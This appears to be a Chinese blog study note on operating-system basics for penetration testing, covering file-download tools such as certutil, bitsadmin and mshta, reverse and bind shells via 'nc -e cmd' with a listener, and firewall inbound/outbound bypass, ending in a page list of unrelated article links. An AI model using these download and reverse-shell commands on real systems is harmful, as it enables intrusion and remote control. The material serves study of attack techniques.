当前位置: 首页 > article >正文

操作系统_名词_文件下载_反弹SHELL_防火墙绕过

操作系统

操作系统-用途&命令&权限&用户&防火墙
1、个人计算机&服务器用机
2、windows&Linux常见命令
3、文件权限&服务权限&用户权限
4、系统用户&用户组&服务用户等分类
5、自带防火墙出站&入站规则策略协议

实用案例1:文件上传下载-解决无图形化&解决数据传输
Linux:wget curl python ruby perl java等
Windows: Powershell Certutil Bitsadmin msiexec mshta rundll32等

实用案例2:反弹Shell命令-解决数据回显&解决数据通讯(反弹就是将权限给别人)
useradd passwd
测试Linux系统添加用户或修改命令交互回显

结合案例1:防火墙绕过-正向链接&反向链接&内网服务器
1、内网:
内网->用户
nc -e cmd ip地址 端口

就是把本机的cmd权限给这个ip的窗口

nc -lvvp 监听的端口号

2.防火墙
服务器主机<->另一个服务器主机
如果开了防火墙,是不行的
入站严格出站宽松
nc -e cmd ip地址 端口(就是正向链接)
主动把权限给出去
反向链接就是别人找你

结合案例-Fofa拿下同行Pikachu服务器
文件下载&反弹shell:
certuil -urlcache -split -f ip地址
nc -e cmd ip地址

在这里插入图片描述
找个在线的靶场

在这里插入图片描述


http://www.kler.cn/news/329997.html

相关文章:

  • Junit和枚举ENUM
  • CentOS 6文件系统
  • 低功耗4G模组Air780E之串口通信篇
  • Kotlin:2.0.0 的新特性
  • 云服务器部署k8s需要什么配置?
  • 关于git分支冲突问题
  • JVM 基本组成
  • 中原台球展,2025郑州台球展会,中国台球产业链发展大会
  • EDM平台大比拼 用户体验与营销效果双重测评
  • 使用 HTMX 从服务器获取文本更新 Quill Editor 的内容
  • 第二十三节:学习拦截器或者使用AOP实现用户token参数请求检测(自学Spring boot 3.x的第六天)
  • .NET 工具库高效生成 PDF 文档
  • 计算机各专业2025毕业设计选题推荐【各专业 | 最新】
  • 麒麟操作系统部分目录介绍
  • 人口普查管理系统基于VUE+SpringBoot+Spring+SpringMVC+MyBatis开发设计与实现
  • Spring之生成Bean
  • 关联式容器:map和set
  • 【QT Quick】基础语法:导入外部JS文件及调试
  • html5 + css3(上)
  • 回首往事,感受change
  • Android Compose的基本使用
  • 每日一题:二分查找
  • 解决Excel时出现“被保护单元格不支持此功能“的解决办法,详细喂饭级教程
  • Raspberry Pi3B+之安装bookworm+Rpanion系统
  • 某客户Oracle RAC无法启动故障快速解决
  • 提升工作效率的编程工具:从选择到应用
  • 什么是ETL?什么是ELT?怎么区分它们使用场景
  • Python字符串string方法大全及使用方法[1]以及FastAPI框架文件上传的处理-client使用postman
  • 数据分析-27-基于pandas进行模糊匹配merge_asof和groupby分组统计
  • javaScript中的浅拷贝和深拷贝详解